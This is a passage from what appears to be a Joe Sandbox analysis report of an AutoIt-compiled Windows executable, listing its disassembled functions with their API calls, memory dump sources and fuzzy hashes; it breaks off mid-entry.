                                                                                                                    • API ID: ObjectPath$Select$BeginCreateDeleteLineMoveStroke
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2783949968-0
                                                                                                                    • Opcode ID: 4ed419099ee229fcfe9d8e0d6407f17218ff084d459cc4b150d2894610f6bb04
                                                                                                                    • Instruction ID: af9b10de2b5e1f20f757a647655db97b0f5a8bbb123370319d9b3a4020b10ea9
                                                                                                                    • Opcode Fuzzy Hash: 4ed419099ee229fcfe9d8e0d6407f17218ff084d459cc4b150d2894610f6bb04
                                                                                                                    • Instruction Fuzzy Hash: EBF06770105258BBE721AF54ED4EFAF3B9CAB06310F108119FE01622D1C7B86A02CBA9
                                                                                                                    Function 0043646A Relevance: 6.0, APIs: 4, Instructions: 30threadwindowtimeCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 00436489
                                                                                                                    • GetWindowThreadProcessId.USER32(?,00000000), ref: 0043649C
                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 004364A3
                                                                                                                    • AttachThreadInput.USER32(00000000), ref: 004364AA
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2710830443-0
                                                                                                                    • Opcode ID: 1738b650cb43453f600e53b83a6833ccb1a076b1e6f33d9371cddf7c9876f8ab
                                                                                                                    • Instruction ID: 8dfc3faa83ebd232c18032ab1719f084f6ac8c8028b438e2b3a9de4cfe148046
                                                                                                                    • Opcode Fuzzy Hash: 1738b650cb43453f600e53b83a6833ccb1a076b1e6f33d9371cddf7c9876f8ab
                                                                                                                    • Instruction Fuzzy Hash: 61F06D7168470477EB209BA09D0EFDF379CAB18B11F10C41ABB04BA0C0C6F8B50087AD
                                                                                                                    Function 00436C2B Relevance: 6.0, APIs: 4, Instructions: 29synchronizationCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00436C38
                                                                                                                    • UnloadUserProfile.USERENV(?,?,?,000000FF), ref: 00436C46
                                                                                                                    • CloseHandle.KERNEL32(?,?,000000FF), ref: 00436C56
                                                                                                                    • CloseHandle.KERNEL32(?,?,000000FF), ref: 00436C5B
                                                                                                                      • Part of subcall function 00436BA9: GetProcessHeap.KERNEL32(00000000,?), ref: 00436BB6
                                                                                                                      • Part of subcall function 00436BA9: HeapFree.KERNEL32(00000000), ref: 00436BBD
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 146765662-0
                                                                                                                    • Opcode ID: b977b2fe1054b7dcb1d3ac6099765c2a2cefd6419b68de81ef4d64d3a5db7b42
                                                                                                                    • Instruction ID: 8fc8aea04bb3fa9100768a89291620bc24087d812574934f99790ad9b639e1d9
                                                                                                                    • Opcode Fuzzy Hash: b977b2fe1054b7dcb1d3ac6099765c2a2cefd6419b68de81ef4d64d3a5db7b42
                                                                                                                    • Instruction Fuzzy Hash: D9E0C97A510215ABC720EBA6DC48C5BB7ACEF99330311892EFD9683750DA74F840CFA4
                                                                                                                    Function 00472B63 Relevance: 6.0, APIs: 4, Instructions: 27COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetDesktopWindow.USER32 ref: 00472B63
                                                                                                                    • GetDC.USER32(00000000), ref: 00472B6C
                                                                                                                    • GetDeviceCaps.GDI32(00000000,0000000C), ref: 00472B78
                                                                                                                    • ReleaseDC.USER32(00000000,?), ref: 00472B99
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CapsDesktopDeviceReleaseWindow
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2889604237-0
                                                                                                                    • Opcode ID: 25b4e9c05087b9933bd86976477b7eaa0c4512bf79646aedece74daf711fda7f
                                                                                                                    • Instruction ID: 759e45c534ddacfdadb557a06d932f9b55f62470d77a370046d272fbe6975a9a
                                                                                                                    • Opcode Fuzzy Hash: 25b4e9c05087b9933bd86976477b7eaa0c4512bf79646aedece74daf711fda7f
                                                                                                                    • Instruction Fuzzy Hash: BFF03071900205AFDB00EFB5DA4DA5DB7F4FB44315B10887EFD05D7251EAB59900DB54
                                                                                                                    Function 00472BB2 Relevance: 6.0, APIs: 4, Instructions: 27COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetDesktopWindow.USER32 ref: 00472BB2
                                                                                                                    • GetDC.USER32(00000000), ref: 00472BBB
                                                                                                                    • GetDeviceCaps.GDI32(00000000,00000074), ref: 00472BC7
                                                                                                                    • ReleaseDC.USER32(00000000,?), ref: 00472BE8
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CapsDesktopDeviceReleaseWindow
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2889604237-0
                                                                                                                    • Opcode ID: cc3434de2b8b5abc20458b04240aea2a6e15dc869db4e5eb232345cc1bf11604
                                                                                                                    • Instruction ID: 439663e17c05eb9dd95bc161916493026628bcc8c78d0f5787bb5213a8e6c1b3
                                                                                                                    • Opcode Fuzzy Hash: cc3434de2b8b5abc20458b04240aea2a6e15dc869db4e5eb232345cc1bf11604
                                                                                                                    • Instruction Fuzzy Hash: FAF03075900205AFCB00EFB5DA8856DB7F4FB84315B10887EFD05D7250DB7999019B94
                                                                                                                    Function 0041514D Relevance: 6.0, APIs: 4, Instructions: 16threadCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • __getptd_noexit.LIBCMT ref: 00415150
                                                                                                                      • Part of subcall function 004179F0: GetLastError.KERNEL32(?,?,00417F7C,00413644,?,?,004115F6,?,00401BAC,?,?,?), ref: 004179F4
                                                                                                                      • Part of subcall function 004179F0: ___set_flsgetvalue.LIBCMT ref: 00417A02
                                                                                                                      • Part of subcall function 004179F0: __calloc_crt.LIBCMT ref: 00417A16
                                                                                                                      • Part of subcall function 004179F0: GetCurrentThreadId.KERNEL32 ref: 00417A46
                                                                                                                      • Part of subcall function 004179F0: SetLastError.KERNEL32(00000000,?,004115F6,?,00401BAC,?,?,?), ref: 00417A5E
                                                                                                                    • CloseHandle.KERNEL32(?,?,0041519B), ref: 00415164
                                                                                                                    • __freeptd.LIBCMT ref: 0041516B
                                                                                                                    • ExitThread.KERNEL32 ref: 00415173
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ErrorLastThread$CloseCurrentExitHandle___set_flsgetvalue__calloc_crt__freeptd__getptd_noexit
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1454798553-0
                                                                                                                    • Opcode ID: 061228abfcaf70d0abda61f2bc5ea784a59968e7eaac298a3a03e2daddecc56e
                                                                                                                    • Instruction ID: f82a1693998e09e6351869d5e4a2ded823041337c12103c56f11d560ed0c89ab
                                                                                                                    • Opcode Fuzzy Hash: 061228abfcaf70d0abda61f2bc5ea784a59968e7eaac298a3a03e2daddecc56e
                                                                                                                    • Instruction Fuzzy Hash: BCD0A732805E10A7C122273D5C0DBDF26655F40735B140B09FC25872D1CBACDDC143AC
                                                                                                                    Function 0042F373 Relevance: 5.6, APIs: 2, Strings: 1, Instructions: 370COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _strncmp
                                                                                                                    • String ID: Q\E
                                                                                                                    • API String ID: 909875538-2189900498
                                                                                                                    • Opcode ID: 065ac9b34865f8fc92d580161c5db786cff1d7033ea8ce1a4bef46ec8c054806
                                                                                                                    • Instruction ID: ec78d02982e52cebfc3c5ce94050df53d12509a5c8006a296af1ac46f88178f7
                                                                                                                    • Opcode Fuzzy Hash: 065ac9b34865f8fc92d580161c5db786cff1d7033ea8ce1a4bef46ec8c054806
                                                                                                                    • Instruction Fuzzy Hash: 34C1A070A04279ABDF318E58A4507ABBBB5AF59310FE441BFD8D493341D2784D8ACB89
                                                                                                                    Function 00460D41 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 277comCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • OleSetContainedObject.OLE32(00000000,00000001), ref: 00460F3E
                                                                                                                      • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                                                                      • Part of subcall function 00445660: OleSetContainedObject.OLE32(?,00000000), ref: 004456DD
                                                                                                                      • Part of subcall function 00451B42: GetLastError.KERNEL32(?,?,00000000), ref: 00451BA0
                                                                                                                      • Part of subcall function 00451B42: VariantCopy.OLEAUT32(?,?), ref: 00451BF8
                                                                                                                      • Part of subcall function 00451B42: VariantCopy.OLEAUT32(?,?), ref: 00451C0E
                                                                                                                      • Part of subcall function 00451B42: VariantCopy.OLEAUT32(?,?), ref: 00451C27
                                                                                                                      • Part of subcall function 00451B42: VariantClear.OLEAUT32(?), ref: 00451CA1
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Variant$Copy$ContainedObject$ClearErrorLast_malloc
                                                                                                                    • String ID: AutoIt3GUI$Container
                                                                                                                    • API String ID: 2652923123-3941886329
                                                                                                                    • Opcode ID: 662e4c56437cfc6d97a34dfd7b47562ea5a254ee8eeedf1ae9933f7f1d1523bc
                                                                                                                    • Instruction ID: 68a0a4eee7c61d0b7a6187be62517e39d581686f9474de6139c94a20f06104f0
                                                                                                                    • Opcode Fuzzy Hash: 662e4c56437cfc6d97a34dfd7b47562ea5a254ee8eeedf1ae9933f7f1d1523bc
                                                                                                                    • Instruction Fuzzy Hash: 68A15D746006059FDB10DF69C881B6BB7E4FF88704F24896AEA09CB351EB75E841CB65
                                                                                                                    Function 0044F3F4 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 185COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _memmove_strncmp
                                                                                                                    • String ID: U$\
                                                                                                                    • API String ID: 2666721431-100911408
                                                                                                                    • Opcode ID: a4fdddafd13fd2658ce45903ac35fff56edfd8920f85f030d52c4513684e2ed7
                                                                                                                    • Instruction ID: d3eef72359a6f1828d14317ef8b56b8bfbdd52bf5bc7584d89ae5f72f5b530e1
                                                                                                                    • Opcode Fuzzy Hash: a4fdddafd13fd2658ce45903ac35fff56edfd8920f85f030d52c4513684e2ed7
                                                                                                                    • Instruction Fuzzy Hash: 13718F70E00245CFEF24CFA9C9906AEFBF2AF99304F24826ED445A7345D778A946CB15
                                                                                                                    Function 00467215 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 181shareCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00410160: _wcslen.LIBCMT ref: 00410162
                                                                                                                      • Part of subcall function 00410160: _wcscpy.LIBCMT ref: 00410182
                                                                                                                    • __wcsnicmp.LIBCMT ref: 00467288
                                                                                                                    • WNetUseConnectionW.MPR(00000000,?,00000000,?,00000000,?,00000000,?), ref: 0046732E
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Connection__wcsnicmp_wcscpy_wcslen
                                                                                                                    • String ID: LPT
                                                                                                                    • API String ID: 3035604524-1350329615
                                                                                                                    • Opcode ID: df00d6e4b866e053a8717e7cd00b83b505630e9b2d4c108cf88e8e3b58e1c49d
                                                                                                                    • Instruction ID: cd88b7ab87c5f5a0ce5478f82160e7cdfa8c7cefd9f65e810a8a3337a25aa570
                                                                                                                    • Opcode Fuzzy Hash: df00d6e4b866e053a8717e7cd00b83b505630e9b2d4c108cf88e8e3b58e1c49d
                                                                                                                    • Instruction Fuzzy Hash: FB51E675A04204ABDB10DF54CC81FAFB7B5AB84708F10855EF905AB381E778EE85CB99
                                                                                                                    Function 0044F082 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 161COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _memmove
                                                                                                                    • String ID: \$h
                                                                                                                    • API String ID: 4104443479-677774858
                                                                                                                    • Opcode ID: a8076df7cf2e4be12816d18a067c44a6d5606508540493043604d0ea2b9ab827
                                                                                                                    • Instruction ID: de34c7bb2fe7d28e42aef252d9636822906cf09101983ade98a7172327fa6e04
                                                                                                                    • Opcode Fuzzy Hash: a8076df7cf2e4be12816d18a067c44a6d5606508540493043604d0ea2b9ab827
                                                                                                                    • Instruction Fuzzy Hash: F551A370E002098FDF18CFA9C980AAEB7F2BFC9304F28826AD405AB345D7389D45CB55
                                                                                                                    Function 0043999F Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 144COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _memcmp
                                                                                                                    • String ID: &
                                                                                                                    • API String ID: 2931989736-1010288
                                                                                                                    • Opcode ID: a81d5415846f9cf6a42c700ef8b5aeadd08d018be41d214ef7d3fe054b701e0f
                                                                                                                    • Instruction ID: 5cd53615f07abd051f481cac668b43ae4088e938354b3ed51608dfeeaf990cc9
                                                                                                                    • Opcode Fuzzy Hash: a81d5415846f9cf6a42c700ef8b5aeadd08d018be41d214ef7d3fe054b701e0f
                                                                                                                    • Instruction Fuzzy Hash: EC517BB1A0011A9FDB18CF95D891ABFB7B5FF88300F14915AE815A7344D278AE42CBA4
                                                                                                                    Function 0044D3D5 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 141COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _memmove
                                                                                                                    • String ID: \
                                                                                                                    • API String ID: 4104443479-2967466578
                                                                                                                    • Opcode ID: 59d63d8f709c00c8b633315d640480ed85dcad38184220530ca382b626518ab4
                                                                                                                    • Instruction ID: e0e732097d18f8f10327b86eac3a97b4532b2e4be511d275227a7a0ca48fbcca
                                                                                                                    • Opcode Fuzzy Hash: 59d63d8f709c00c8b633315d640480ed85dcad38184220530ca382b626518ab4
                                                                                                                    • Instruction Fuzzy Hash: 2451C570E002498FEF24CFA9C8902AEFBB2BF95314F28826BD45597385D7395D86CB45
                                                                                                                    Function 004667E1 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 114networkCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • _wcslen.LIBCMT ref: 00466825
                                                                                                                    • InternetCrackUrlW.WININET(?,00000000,?), ref: 0046682F
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CrackInternet_wcslen
                                                                                                                    • String ID: |
                                                                                                                    • API String ID: 596671847-2343686810
                                                                                                                    • Opcode ID: 629f28f3e202f2691df4b53306abf03f6cbb1f7e83fd6186c7c4399916927608
                                                                                                                    • Instruction ID: c4ea99685e293915e64884ba1c360efc28696701351dc191072b09a6dd262d67
